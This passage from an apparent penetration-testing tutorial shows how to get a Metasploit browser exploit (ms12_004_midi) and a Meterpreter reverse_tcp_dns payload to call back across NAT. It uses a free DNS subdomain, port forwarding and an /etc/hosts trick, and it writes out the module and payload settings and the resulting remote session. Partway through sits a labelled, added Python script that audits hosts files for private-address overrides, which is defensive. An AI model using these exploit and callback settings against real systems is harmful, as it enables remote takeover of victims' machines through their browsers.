We overcome this obstacle by creating a free DNS subdomain and pointing it at our public IP. I used the site freedns.afraid.org. There are a number of domains to leverage.
Remember, we will need to port forward two ports to our Metasploit listener box's internal IP. In this example, I've forwarded TCP port 8080 (webserver) and TCP port 4443 (payload connect back).
**Important - In order to bind our listening address, create the payload, and enable the payload to connect back to our public IP address, we need to edit our '/etc/hosts' file.
Add the following line (hostip is the internal IP Metasploit is listening on, subdomain.domain.com is the new DNS subdomain you created that points to your external IP):
hostip subdomain.domain.com
**Additionally, it is important that when Metasploit resolves the DNS hostname, it gets the internal IP address, because the resolver consults '/etc/hosts' before querying DNS. This lets Metasploit bind locally while the same name resolves to our public IP everywhere else. This is why we added the above entry to our '/etc/hosts' file.
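The hosts entry above works because the local resolver consults '/etc/hosts' before DNS, so one name resolves to an internal address on this box and to the public address everywhere else. That split state is also exactly what an administrator auditing a host wants to notice. The following Python script is an added example, not code from the original post: it parses hosts-file text and reports public-looking names pinned to private (RFC 1918 / ULA) addresses. The hosts content, the address 10.0.0.15, and the suffix list used to skip intranet-only names are constructed assumptions for the example.

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed sample hosts-file content (assumption, not taken from any real host).
SAMPLE_HOSTS = """\
127.0.0.1     localhost
::1           localhost ip6-localhost
10.0.0.15     subdomain.domain.com      # public name pinned to an internal address
192.168.1.20  fileserver.corp.local
93.184.216.34 example.com
"""

# Name suffixes treated as intranet-only, so a private address for them is expected.
# This list is a heuristic assumption for the example; tune it for your environment.
INTERNAL_SUFFIXES = (".local", ".localdomain", ".internal", ".lan", ".home")


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs from hosts-file text.

    Comments (everything after '#') and blank lines are ignored, and a line whose
    first field is not a valid IPv4/IPv6 address is skipped as malformed.
    """
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        addr, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue
        for name in names:
            pairs.append((addr, name.lower()))
    return pairs


def find_private_overrides(text: str) -> Dict[str, str]:
    """Map hostname -> address for public-looking names pinned to private addresses.

    Loopback and link-local entries, single-label names, and names under an
    intranet-only suffix are ignored; everything else that resolves to a private
    address is reported, since the local resolver will then disagree with public DNS.
    """
    overrides: Dict[str, str] = {}
    for addr, name in parse_hosts(text):
        ip = ipaddress.ip_address(addr)
        if ip.is_loopback or ip.is_link_local:
            continue
        if "." not in name or name.endswith(INTERNAL_SUFFIXES):
            continue
        if ip.is_private:
            overrides[name] = addr
    return overrides


if __name__ == "__main__":
    for name, addr in find_private_overrides(SAMPLE_HOSTS).items():
        print(f"hosts override: {name} -> {addr} (private address for a public-looking name)")
```

Run it against the real file with `find_private_overrides(open("/etc/hosts").read())`; on the sample it reports only subdomain.domain.com, since example.com maps to a public address and fileserver.corp.local is under an intranet suffix.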
Now that we've laid the foundation, we can move forward to setting up Metasploit. In this example, we use the 'ms12_004_midi' browser exploit module.
use exploit/windows/browser/ms12_004_midi
We will use the Meterpreter 'reverse_tcp_dns' payload, which lets us embed our DNS hostname in the payload instead of a fixed IP, so it can call back to us. This is an important step.
set PAYLOAD windows/meterpreter/reverse_tcp_dns
Set our variables.
set SRVHOST 10.0.0.15
set URIPATH lamesauce
set LHOST subdomain.domain.com
set LPORT 4443
We are ready to start our server.
exploit
Now we test from our external Windows host. Visit the URL containing our new domain.
The vulnerability in the browser is exploited. In this case, the Media Player plugin has a vulnerability in the way it handles (or can't handle) a corrupted .midi file. We get our Meterpreter session.
The payload was able to call back to our listener using DNS. We now have a two-way connection, a Meterpreter session, all done over NAT.